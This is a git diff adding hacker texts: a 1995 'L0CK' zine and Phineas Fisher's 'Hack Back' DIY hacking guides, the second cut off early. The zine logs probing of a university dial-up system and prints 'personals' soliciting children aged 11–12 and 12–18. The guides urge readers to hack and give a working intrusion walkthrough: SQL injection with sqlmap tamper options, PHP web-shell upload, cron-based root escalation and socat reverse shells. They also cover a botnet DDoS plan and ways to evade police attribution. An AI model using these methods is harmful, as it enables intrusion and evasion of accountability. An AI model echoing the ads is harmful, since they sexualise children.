@@ -0,0 +1,261 @@ + + + + + \ _ _ / ARG! ARG! ARG! ARG! ARG! ARG! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the GNU October 1995 release. / (_) \ + / Let's Pretend I'm the adult and you're the little \ + boy.. So Grab Ur 3-D Glasses! L0CK is BACK! + + + + ...................................................................... + + + + + + + Table_Of_Contents + ~~~~~~~~~~~~~~~~~ + + hacking college computers..................sarlo + letters to L0CK............................blewt + L0CK personals.............................max-q + the warrior's prayer.......................blewt + + + + + + + ...................................................................... + + + + + ***THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY*** + ***I ACCEPT NO RESPONSABILITY FOR ANYTHING YOU DO*** + ***WHICH GETS YOU ARRESTED OR SOMETHING*** + + &%&%&%&%&%&%&%& Fun with Temple's Computers &%&%&%&%&%&%&%&% + +Shut up what's the number!? + +Gee your impatient... +2400 - (215)204-9630 +9600 - (215)204-9638 +14400 - (215)204-2800 + +So what the hell do I get? + +The following is a log of my activites... +Pardon my stuoidyt I'm not familiar with the system... +It is short but to me it looks like you could have a LOTTA fun ! + +CONNECT 14400/ARQ +C + + +Welcome to TempleNet - Temple University's Ethernet network + +Enter a Command followed by [Return] or [Enter]. + + Command: Description: + telnet astro Astro Unix system + tn3270 ibm IBM mainframe + telnet library Temple's library catalog + +For HELP, call the Network HOTLINE at 204-6529. + +**Dialin for up to 2400 bps: 204-9630 thru 9634 (40 ports to WiseOwl) +**Dialin for up to 9600 bps: 204-9638 (7 ports to WiseOwl) +**Dialin for up to 14400 bps: 204-2800 (64 ports to TempleNet) + +This system is restricted to authorized Temple University users and is +subject to audit. 
The unauthorized access, use, or modification of any +network component is a criminal violation of federal and state laws. (4) + + + + +TempleNet>telnet ibm +Trying IBM (155.247.14.2)... Open + . + +.exit + +HCPCFC015E Command not valid before LOGON: EXIT + +Enter one of the following commands: + + LOGON userid (Example: LOGON VMUSER1) + LOGOFF +.logon vmuser1 + +HCPLGA053E VMUSER1 not in CP directory + +Enter one of the following commands: + + LOGON userid (Example: LOGON VMUSER1) + LOGOFF +.logoff + +LOGOFF AT 22:27:26 EDT FRIDAY 06/09/95 + +[Connection to IBM closed by foreign host] +TempleNet> + +TempleNet>? + +connect Connect to host - same as typing just a host name +disconnect Break the connection specified by name or number +exit, quit, logout Exit from the EXEC +lat Connect to service using DEC LAT protocol +lock Lock the terminal +name-connection Give a connection a logical name +resume Make the named connection be current +rlogin Connect to host using rlogin protocol +show Information commands, type "show ?" for list +slip Enter SLIP mode +systat Show terminal lines and users +telnet Connect to host using telnet protocol +tn3270 Connect to host using telnet protocol (3270) +terminal Change terminal's parameters, type "terminal ?" +where Show open connections +xremote Enter XRemote mode + To resume connection + +TempleNet> + +TempleNet>telnet astro +Trying ASTRO (155.247.165.100)... Open + + +EP/IX (astro) + +login: user1 +Password: +UX:login: ERROR: Login incorrect + +NO CARRIER + +Now remember ... :-) +This system is restricted to authorized Temple University users and is +subject to audit. The unauthorized access, use, or modification of any +network component is a criminal violation of federal and state laws. 
(4) + +Have fun with it!(Oh by the way I dialed the number by "accident" Hehehe) + +-Sarlo 10/13/95 [L0CK] + + +------------------------------------------------------------------------------ + LETTERS TO [L0CK] +Dear [L0CK], + I have been dating my boyfreind for almost 2 years and i thought i really + loved him. But a few months ago i met another guy who is absolutely + adoreable and lots of fun to be with. I feel guilty and miserable when + I'm with this other man. What sould I do, [L0CK]? + - Torn Between Two Lovers + +Dear Torn, + Ah the classic love triangle. The situation is really not fair to anyone, + but the longer you stay in it the stickier it will get.[teehee] Get your + long-term relationship out in the open. Whatever you decide to do, do it + fast and gently! + - blewt [L0CK] +****************************************************************************** +ATTENTION: WE DECIDED TO ADD A NEW SECTION TO THE [L0CK] GNUZLETTER: THIS IS +IN LARGE PART DUE TO LOTS OF MEN WRITTING ME AND ASKING ME TO PRINT THEIR +PERSONALS. I HAD MY DOUBTS ABOUT IT, BUT SINCE MANY MEN HAVE NOT FOUND TRUE +LOVE LIKE I HAVE WITH MY BROTHERS, I FELT PITY FOR THEM. JUST LIKE BATMAN +AND ROBIN, WALLY AND THE BEAVER, SKIPPER AND GILLIGAN, MINOR THREAT AND +MUCHO MAAS THEY CAN FIND TRUE BROTHERLY HAPPINESS. - MAX-Q +***************************************************************************** + | + COCK-A-DOODLE-DOO | JOIN IN OUR PAGAN MEETINGS + | + Pre-Op Transexual Marine looking | A Bi-Weekly Discussion of Life + for boys who like red bottoms and | and Homosexuality. Call and be + propper punishment. | involved. 703-360-8427 + | +--------------------------------------+--------------------------------------- + | + ARE YOU AFRAID OF THE DARK | ORAL ATHLETIC AND FLEXIBLE + | + Confused About Relationships and | Seeking Discreet Dominant Male + tired of being hassled by nosey | for sensual stimulation and some + Investigators from the Child Welfare | Phantastic times. 
You Know what + Agencey? We Can Help. Discreet. | You want! Come and Get it! + | +--------------------------------------+--------------------------------------- + | + YOU KNOW THE CONSEQUENCES | YOUR SPECIAL AD + | + Help Me Seize Young Offenders and | COULD BE RIGHT HERE #@! + their Equipment. I'll Show You an | + Interjudicial Proceeding that will | SEND ELECTRONIC MAIL TO: + Change Your Lifestyle! | MAX-Q@2600.COM + | +--------------------------------------+--------------------------------------- + | + ARE YOU 11 OR 12 ??? | Str41Gh+ Act1nG M4l3 (El1t3) + | + Looking for men 11 - 12 for adult | L00k1ng F0r MasCul1n3 Sh0rt GuY + video satisfaction. I am 35 into | f0R s4fe T1m3s. I w4n+ t0 B3 + Professional wrestling. | Tr34t3d Juzt L1k3 a L1tTle g1rL. + Let's talk soon : 505-984-8800 | d0 m3 n0w!! : 516-T0o-kRAd + | +--------------------------------------+--------------------------------------- + | + LET'S BE FREE | MUCH OLDER GENTLEMAN + | + Gay White Male 38, 5'11" looking | Looking For Asian Boy 12 - 18 + for men, 12 - 32 clean, fit, and | who is petite. Someone to go + hairy. Discreet Encounters. | out with. Very Discreet. + Call Anytime : 516-751-2600 | Call Tonight! 011-61-2-368-0041 + | +--------------------------------------+--------------------------------------- + +"The Warrior's Prayer," by blewt [L0CK] + +To my ancestors, whom I shall leave anonymous, and my man, max-q: + +I leave this day for battle. +I know not whom I fight. +The victory is not certain. +For our enemies are strong. + +I carry myself with courage. +Though I quake with fear. +I fight them all with honor. +For I have my brothers near. + +Oh ye I pray to thee, +Those who came before, +For the strength of heart I need... +Just to lift this keyboard. + +I know I seem the coward, +Standing on the snow. +I no longer wear my armor. +I have lost my will to love. + +What can I do with this life, +O ye in the beyond? +How can I look the others in the face, +Now that my will to love is gone? 
+ +So to thee I say my final goodbye, +And a hardy forget-me-not. +For I'll always have my brothers, +And together we are [L0CK]. + + - blewt - 1995 + + diff --git a/PhineasFisher/1.txt b/PhineasFisher/1.txt new file mode 100755 index 0000000..a357861 --- /dev/null +++ b/PhineasFisher/1.txt 
@@ -0,0 +1,407 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide for those without the patience to wait for whistleblowers + + +--[ 1 ]-- Introduction + +I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz +it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple +it is, and to hopefully inform and inspire you to go out and hack shit. If you +have no experience with programming or hacking, some of the text below might +look like a foreign language. Check the resources section at the end to help you +get started. And trust me, once you've learned the basics you'll realize this +really is easier than filing a FOIA request. + + +--[ 2 ]-- Staying Safe + +This is illegal, so you'll need to take same basic precautions: + +1) Make a hidden encrypted volume with Truecrypt 7.1a [0] +2) Inside the encrypted volume install Whonix [1] +3) (Optional) While just having everything go over Tor thanks to Whonix is + probably sufficient, it's better to not use an internet connection connected + to your name or address. A cantenna, aircrack, and reaver can come in handy + here. + +[0] https://truecrypt.ch/downloads/ +[1] https://www.whonix.org/wiki/Download#Install_Whonix + +As long as you follow common sense like never do anything hacking related +outside of Whonix, never do any of your normal computer usage inside Whonix, +never mention any information about your real life when talking with other +hackers, and never brag about your illegal hacking exploits to friends in real +life, then you can pretty much do whatever you want with no fear of being v&. + +NOTE: I do NOT recommend actually hacking directly over Tor. 
While Tor is usable +for some things like web browsing, when it comes to using hacking tools like +nmap, sqlmap, and nikto that are making thousands of requests, they will run +very slowly over Tor. Not to mention that you'll want a public IP address to +receive connect back shells. I recommend using servers you've hacked or a VPS +paid with bitcoin to hack from. That way only the low bandwidth text interface +between you and the server is over Tor. All the commands you're running will +have a nice fast connection to your target. + + +--[ 3 ]-- Mapping out the target + +Basically I just repeatedly use fierce [0], whois lookups on IP addresses and +domain names, and reverse whois lookups to find all IP address space and domain +names associated with an organization. + +[0] http://ha.ckers.org/fierce/ + +For an example let's take Blackwater. We start out knowing their homepage is at +academi.com. Running fierce.pl -dns academi.com we find the subdomains: +67.238.84.228 email.academi.com +67.238.84.242 extranet.academi.com +67.238.84.240 mail.academi.com +67.238.84.230 secure.academi.com +67.238.84.227 vault.academi.com +54.243.51.249 www.academi.com + +Now we do whois lookups and find the homepage of www.academi.com is hosted on +Amazon Web Service, while the other IPs are in the range: +NetRange: 67.238.84.224 - 67.238.84.255 +CIDR: 67.238.84.224/27 +CustName: Blackwater USA +Address: 850 Puddin Ridge Rd + +Doing a whois lookup on academi.com reveals it's also registered to the same +address, so we'll use that as a string to search with for the reverse whois +lookups. As far as I know all the actual reverse whois lookup services cost +money, so I just cheat with google: +"850 Puddin Ridge Rd" inurl:ip-address-lookup +"850 Puddin Ridge Rd" inurl:domaintools + +Now run fierce.pl -range on the IP ranges you find to lookup dns names, and +fierce.pl -dns on the domain names to find subdomains and IP addresses. 
Do more +whois lookups and repeat the process until you've found everything. + +Also just google the organization and browse around its websites. For example on +academi.com we find links to a careers portal, an online store, and an employee +resources page, so now we have some more: +54.236.143.203 careers.academi.com +67.132.195.12 academiproshop.com +67.238.84.236 te.academi.com +67.238.84.238 property.academi.com +67.238.84.241 teams.academi.com + +If you repeat the whois lookups and such you'll find academiproshop.com seems to +not be hosted or maintained by Blackwater, so scratch that off the list of +interesting IPs/domains. + +In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com +was simply a whois lookup of finfisher.com which found it registered to the name +"FinFisher GmbH". Googling for: +"FinFisher GmbH" inurl:domaintools +finds gamma-international.de, which redirects to finsupport.finfisher.com + +...so now you've got some idea how I map out a target. +This is actually one of the most important parts, as the larger the attack +surface that you are able to map out, the easier it will be to find a hole +somewhere in it. + + +--[ 4 ]-- Scanning & Exploiting + +Scan all the IP ranges you found with nmap to find all services running. Aside +from a standard port scan, scanning for SNMP is underrated. + +Now for each service you find running: + +1) Is it exposing something it shouldn't? Sometimes companies will have services +running that require no authentication and just assume it's safe because the url +or IP to access it isn't public. Maybe fierce found a git subdomain and you can +go to git.companyname.come/gitweb/ and browse their source code. + +2) Is it horribly misconfigured? Maybe they have an ftp server that allows +anonymous read or write access to an important directory. Maybe they have a +database server with a blank admin password (lol stratfor). 
Maybe their embedded +devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's +default password. + +3) Is it running an old version of software vulnerable to a public exploit? + + +Webservers deserve their own category. For any webservers, including ones nmap +will often find running on nonstandard ports, I usually: + +1) Browse them. Especially on subdomains that fierce finds which aren't intended +for public viewing like test.company.com or dev.company.com you'll often find +interesting stuff just by looking at them. + +2) Run nikto [0]. This will check for things like webserver/.svn/, +webserver/backup/, webserver/phpinfo.php, and a few thousand other common +mistakes and misconfigurations. + +3) Identify what software is being used on the website. WhatWeb is useful [1] + +4) Depending on what software the website is running, use more specific tools +like wpscan [2], CMS-Explorer [3], and Joomscan [4]. + +First try that against all services to see if any have a misconfiguration, +publicly known vulnerability, or other easy way in. If not, it's time to move +on to finding a new vulnerability: + +5) Custom coded web apps are more fertile ground for bugs than large widely used +projects, so try those first. I use ZAP [5], and some combination of its +automated tests along with manually poking around with the help of its +intercepting proxy. + +6) For the non-custom software they're running, get a copy to look at. If it's +free software you can just download it. If it's proprietary you can usually +pirate it. If it's proprietary and obscure enough that you can't pirate it you +can buy it (lame) or find other sites running the same software using google, +find one that's easier to hack, and get a copy from them. 
+ +[0] http://www.cirt.net/nikto2 +[1] http://www.morningstarsecurity.com/research/whatweb +[2] http://wpscan.org/ +[3] https://code.google.com/p/cms-explorer/ +[4] http://sourceforge.net/projects/joomscan/ +[5] https://code.google.com/p/zaproxy/ + + +For finsupport.finfisher.com the process was: + +* Start nikto running in the background. + +* Visit the website. See nothing but a login page. Quickly check for sqli in the + login form. + +* See if WhatWeb knows anything about what software the site is running. + +* WhatWeb doesn't recognize it, so the next question I want answered is if this + is a custom website by Gamma, or if there are other websites using the same + software. + +* I view the page source to find a URL I can search on (index.php isn't + exactly unique to this software). I pick Scripts/scripts.js.php, and google: + allinurl:"Scripts/scripts.js.php" + +* I find there's a handful of other sites using the same software, all coded by + the same small webdesign firm. It looks like each site is custom coded but + they share a lot of code. So I hack a couple of them to get a collection of + code written by the webdesign firm. + +At this point I can see the news stories that journalists will write to drum +up views: "In a sophisticated, multi-step attack, hackers first compromised a +web design firm in order to acquire confidential data that would aid them in +attacking Gamma Group..." + +But it's really quite easy, done almost on autopilot once you get the hang of +it. It took all of a couple minutes to: + +* google allinurl:"Scripts/scripts.js.php" and find the other sites + +* Notice they're all sql injectable in the first url parameter I try. 
+ +* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with + the option --tamper='tamper/modsecurityversioned.py' + +* Acquire the admin login information, login and upload a php shell [1] (the + check for allowable file extensions was done client side in javascript), and + download the website's source code. + +[0] http://sqlmap.org/ +[1] https://epinna.github.io/Weevely/ + +Looking through the source code they might as well have named it Damn Vulnerable +Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in +javascript, and if you're unauthenticated the admin page just sends you back to +the login page with a Location header, but you can have your intercepting proxy +filter the Location header out and access it just fine. + +[0] http://www.dvwa.co.uk/ + +Heading back over to the finsupport site, the admin /BackOffice/ page returns +403 Forbidden, and I'm having some issues with the LFI, so I switch to using the +sqli (it's nice to have a dozen options to choose from). The other sites by the +web designer all had an injectable print.php, so some quick requests to: +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 +reveal that finsupport also has print.php and it is injectable. And it's +database admin! For MySQL this means you can read and write files. It turns out +the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. +But I can use a short script that uses sqlmap --file-read to get the php source +for a URL, and a normal web request to get the HTML, and then finds files +included or required in the php source, and finds php files linked in the HTML, +to recursively download the source to the whole site. + +Looking through the source, I see customers can attach a file to their support +tickets, and there's no check on the file extension. 
So I pick a username and +password out of the customer database, create a support request with a php shell +attached, and I'm in! + + +--[ 5 ]-- (fail at) Escalating + + ___________ +< got r00t? > + ----------- + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || + ^^^^^^^^^^^^^^^^ + +Root over 50% of linux servers you encounter in the wild with two easy scripts, +Linux_Exploit_Suggester [0], and unix-privesc-check [1]. + +[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester +[1] https://code.google.com/p/unix-privesc-check/ + +finsupport was running the latest version of Debian with no local root exploits, +but unix-privesc-check returned: +WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user +www-data can write to /etc/cron.hourly/mgmtlicensestatus +WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data +can write to /etc/cron.hourly/webalizer + +so I add to /etc/cron.hourly/webalizer: +chown root:root /path/to/my_setuid_shell +chmod 04755 /path/to/my_setuid_shell + +wait an hour, and ....nothing. Turns out that while the cron process is running +it doesn't seem to be actually running cron jobs. Looking in the webalizer +directory shows it didn't update stats the previous month. Apparently after +updating the timezone cron will sometimes run at the wrong time or sometimes not +run at all and you need to restart cron after changing the timezone. ls -l +/etc/localtime shows the timezone got updated June 6, the same time webalizer +stopped recording stats, so that's probably the issue. At any rate, the only +thing this server does is host the website, so I already have access to +everything interesting on it. Root wouldn't get much of anything new, so I move +on to the rest of the network. + + +--[ 6 ]-- Pivoting + +The next step is to look around the local network of the box you hacked. 
This +is pretty much the same as the first Scanning & Exploiting step, except that +from behind the firewall many more interesting services will be exposed. A +tarball containing a statically linked copy of nmap and all its scripts that you +can upload and run on any box is very useful for this. The various nfs-* and +especially smb-* scripts nmap has will be extremely useful. + +The only interesting thing I could get on finsupport's local network was another +webserver serving up a folder called 'qateam' containing their mobile malware. + + +--[ 7 ]-- Have Fun + +Once you're in their networks, the real fun starts. Just use your imagination. +While I titled this a guide for wannabe whistleblowers, there's no reason to +limit yourself to leaking documents. My original plan was to: +1) Hack Gamma and obtain a copy of the FinSpy server software +2) Find vulnerabilities in FinSpy server. +3) Scan the internet for, and hack, all FinSpy C&C servers. +4) Identify the groups running them. +5) Use the C&C server to upload and run a program on all targets telling them + who was spying on them. +6) Use the C&C server to uninstall FinFisher on all targets. +7) Join the former C&C servers into a botnet to DDoS Gamma Group. + +It was only after failing to fully hack Gamma and ending up with some +interesting documents but no copy of the FinSpy server software that I had to +make due with the far less lulzy backup plan of leaking their stuff while +mocking them on twitter. +Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password +already so I can move on to step 2! + + +--[ 8 ]-- Other Methods + +The general method I outlined above of scan, find vulnerabilities, and exploit +is just one way to hack, probably better suited to those with a background in +programming. There's no one right way, and any method that works is as good as +any other. 
The other main ways that I'll state without going into detail are: + +1) Exploits in web browers, java, flash, or microsoft office, combined with +emailing employees with a convincing message to get them to open the link or +attachment, or hacking a web site frequented by the employees and adding the +browser/java/flash exploit to that. +This is the method used by most of the government hacking groups, but you don't +need to be a government with millions to spend on 0day research or subscriptions +to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit +for a couple thousand, and rent access to one for much less. There's also +metasploit browser autopwn, but you'll probably have better luck with no +exploits and a fake flash updater prompt. + +2) Taking advantage of the fact that people are nice, trusting, and helpful 95% +of the time. +The infosec industry invented a term to make this sound like some sort of +science: "Social Engineering". This is probably the way to go if you don't know +too much about computers, and it really is all it takes to be a successful +hacker [0]. 
+ +[0] https://www.youtube.com/watch?v=DB6ywr9fngU + + +--[ 9 ]-- Resources + +Links: + +* https://www.pentesterlab.com/exercises/ +* http://overthewire.org/wargames/ +* http://www.hackthissite.org/ +* http://smashthestack.org/ +* http://www.win.tue.nl/~aeb/linux/hh/hh.html +* http://www.phrack.com/ +* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot +* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash +* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ +* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers + (all his other blog posts are great too) +* https://www.corelan.be/ (start at Exploit writing tutorial part 1) +* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ + One trick it leaves out is that on most systems the apache access log is + readable only by root, but you can still include from /proc/self/fd/10 or + whatever fd apache opened it as. It would also be more useful if it mentioned + what versions of php the various tricks were fixed in. +* http://www.dest-unreach.org/socat/ + Get usable reverse shells with a statically linked copy of socat to drop on + your target and: + target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM + host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM + It's also useful for setting up weird pivots and all kinds of other stuff. + +Books: + +* The Web Application Hacker's Handbook +* Hacking: The Art of Exploitation +* The Database Hacker's Handbook +* The Art of Software Security Assessment +* A Bug Hunter's Diary +* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier +* TCP/IP Illustrated + +Aside from the hacking specific stuff almost anything useful to a system +administrator for setting up and administering networks will also be useful for +exploring them. 
This includes familiarity with the windows command prompt and unix +shell, basic scripting skills, knowledge of ldap, kerberos, active directory, +networking, etc. + + +--[ 10 ]-- Outro + +You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a +tool. It's not selling hacking tools that makes Gamma evil. It's who their +customers are targeting and with what purpose that makes them evil. That's not +to say that tools are inherently neutral. Hacking is an offensive tool. In the +same way that guerrilla warfare makes it harder to occupy a country, whenever +it's cheaper to attack than to defend it's harder to maintain illegitimate +authority and inequality. So I wrote this to try to make hacking easier and more +accessible. And I wanted to show that the Gamma Group hack really was nothing +fancy, just standard sqli, and that you do have the ability to go out and take +similar action. + +Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea +Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned +hackers, dissidents, and criminals! \ No newline at end of file diff --git a/PhineasFisher/2.txt b/PhineasFisher/2.txt new file mode 100755 index 0000000..6918a58 --- /dev/null +++ b/PhineasFisher/2.txt 
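Review bot: PhineasFisher/1.txt ends without a trailing newline (the `\ No newline at end of file` marker after the final "hackers, dissidents, and criminals!" line) and is added as `new file mode 100755`, although it is a plain-text file and L0CK/l0ck4.txt in the same patch is added as 100644. Suggest terminating the last line with a newline so that later appends and concatenation produce clean diffs, and committing the file as 100644, since nothing in it is meant to be executed. The header for PhineasFisher/2.txt shows the same 100755 mode and would need the same change.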
@@ -0,0 +1,925 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide + + + + ,-._,-._ + _,-\ o O_/; + / , ` `| + | \-.,___, / ` + \ `-.__/ / ,.\ + / `-.__.-\` ./ \' + / /| ___\ ,/ `\ + ( ( |.-"` '/\ \ ` + \ \/ ,, | \ _ + \| o/o / \. + \ , / / + ( __`;-;'__`) \\ + `//'` `||` `\ + _// || __ _ _ _____ __ + .-"-._,(__) .(__).-""-. | | | | |_ _| | + / \ / \ | | |_| | | | | + \ / \ / | | _ | | | | + `'-------` `--------'` __| |_| |_| |_| |__ + #antisec + + + +--[ 1 - Introduction ]---------------------------------------------------------- + +You'll notice the change in language since the last edition [1]. The +English-speaking world already has tons of books, talks, guides, and +info about hacking. In that world, there's plenty of hackers better than me, +but they misuse their talents working for "defense" contractors, for intelligence +agencies, to protect banks and corporations, and to defend the status quo. +Hacker culture was born in the US as a counterculture, but that origin only +remains in its aesthetics - the rest has been assimilated. At least they can +wear a t-shirt, dye their hair blue, use their hacker names, and feel like +rebels while they work for the Man. + +You used to have to sneak into offices to leak documents [2]. You used to need +a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. +Like the CNT said after the Gamma Group hack: "Let's take a step forward with +new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! 
+ +[1] http://pastebin.com/raw.php?i=cRYvK4jb +[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI +[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html +[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf +[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group + + +--[ 2 - Hacking Team ]---------------------------------------------------------- + +Hacking Team was a company that helped governments hack and spy on +journalists, activists, political opposition, and other threats to their power +[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals +and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the +fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende +RCS". They also claimed to have technology to solve the "problem" posed by Tor +and the darknet [13]. But seeing as I'm still free, I have my doubts about +its effectiveness. 
+ +[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/ +[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html +[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/ +[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/ +[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/ +[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/ +[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/ +[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal +[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/ +[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/ +[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/ +[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html +[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web + + +--[ 3 - Stay safe out there ]--------------------------------------------------- + +Unfortunately, our world is backwards. You get rich by doing bad things and go +to jail for doing good. Fortunately, thanks to the hard work of people like +the Tor project [1], you can avoid going to jail by taking a few simple +precautions: + +1) Encrypt your hard disk [2] + + I guess when the police arrive to seize your computer, it means you've + already made a lot of mistakes, but it's better to be safe. + +2) Use a virtual machine with all traffic routed through Tor + + This accomplishes two things. First, all your traffic is anonymized through + Tor. 
Second, keeping your personal life and your hacking on separate + computers helps you not to mix them by accident. + + You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or + something custom [6]. Here's [7] a detailed comparison. + +3) (Optional) Don't connect directly to Tor + + Tor isn't a panacea. They can correlate the times you're connected to Tor + with the times your hacker handle is active. Also, there have been + successful attacks against Tor [8]. You can connect to Tor using other + peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for + cracking wifi. Another option is to connect to a VPN or a bridge node [10] + before Tor, but that's less secure because they can still correlate the + hacker's activity with your house's internet activity (this was used as + evidence against Jeremy Hammond [11]). + + The reality is that while Tor isn't perfect, it works quite well. When I + was young and reckless, I did plenty of stuff without any protection (I'm + referring to hacking) apart from Tor, that the police tried their hardest + to investigate, and I've never had any problems. + +[1] https://www.torproject.org/ +[2] https://info.securityinabox.org/es/chapter-4 +[3] https://www.whonix.org/ +[4] https://tails.boum.org/ +[5] https://www.qubes-os.org/doc/privacy/torvm/ +[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy +[7] https://www.whonix.org/wiki/Comparison_with_Others +[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/ +[9] http://www.wifislax.com/ +[10] https://www.torproject.org/docs/bridges.html.en +[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html + + +----[ 3.1 - Infrastructure ]---------------------------------------------------- + +I don't hack directly from Tor exit nodes. They're on blacklists, they're +slow, and they can't receive connect-backs. 
Tor protects my anonymity while I +connect to the infrastructure I use to hack, which consists of: + +1) Domain Names + + For C&C addresses, and for DNS tunnels for guaranteed egress. + +2) Stable Servers + + For use as C&C servers, to receive connect-back shells, to launch attacks, + and to store the loot. + +3) Hacked Servers + + For use as pivots to hide the IP addresses of the stable servers. And for + when I want a fast connection without pivoting, for example to scan ports, + scan the whole internet, download a database with sqli, etc. + +Obviously, you have to use an anonymous payment method, like bitcoin (if it's +used carefully). + + +----[ 3.2 - Attribution ]------------------------------------------------------- + +In the news we often see attacks traced back to government-backed hacking +groups ("APTs"), because they repeatedly use the same tools, leave the same +footprints, and even use the same infrastructure (domains, emails, etc). +They're negligent because they can hack without legal consequences. + +I didn't want to make the police's work any easier by relating my hack of +Hacking Team with other hacks I've done or with names I use in my day-to-day +work as a blackhat hacker. So, I used new servers and domain names, registered +with new emails, and payed for with new bitcoin addresses. Also, I only used +tools that are publicly available, or things that I wrote specifically for +this attack, and I changed my way of doing some things to not leave my usual +forensic footprint. + + +--[ 4 - Information Gathering ]------------------------------------------------- + +Although it can be tedious, this stage is very important, since the larger the +attack surface, the easier it is to find a hole somewhere in it. + + +----[ 4.1 - Technical Information ]--------------------------------------------- + +Some tools and techniques are: + +1) Google + + A lot of interesting things can be found with a few well-chosen search + queries. 
For example, the identity of DPR [1]. The bible of Google hacking + is the book "Google Hacking for Penetration Testers". You can find a short + summary in Spanish at [2]. + +2) Subdomain Enumeration + + Often, a company's main website is hosted by a third party, and you'll find + the company's actual IP range thanks to subdomains like mx.company.com or + ns1.company.com. Also, sometimes there are things that shouldn't be exposed + in "hidden" subdomains. Useful tools for discovering domains and subdomains + are fierce [3], theHarvester [4], and recon-ng [5]. + +3) Whois lookups and reverse lookups + + With a reverse lookup using the whois information from a domain or IP range + of a company, you can find other domains and IP ranges. As far as I know, + there's no free way to do reverse lookups aside from a google "hack": + + "via della moscova 13" site:www.findip-address.com + "via della moscova 13" site:domaintools.com + +4) Port scanning and fingerprinting + + Unlike the other techniques, this talks to the company's servers. I + include it in this section because it's not an attack, it's just + information gathering. The company's IDS might generate an alert, but you + don't have to worry since the whole internet is being scanned constantly. + + For scanning, nmap [6] is precise, and can fingerprint the majority of + services discovered. For companies with very large IP ranges, zmap [7] or + masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web + sites. 
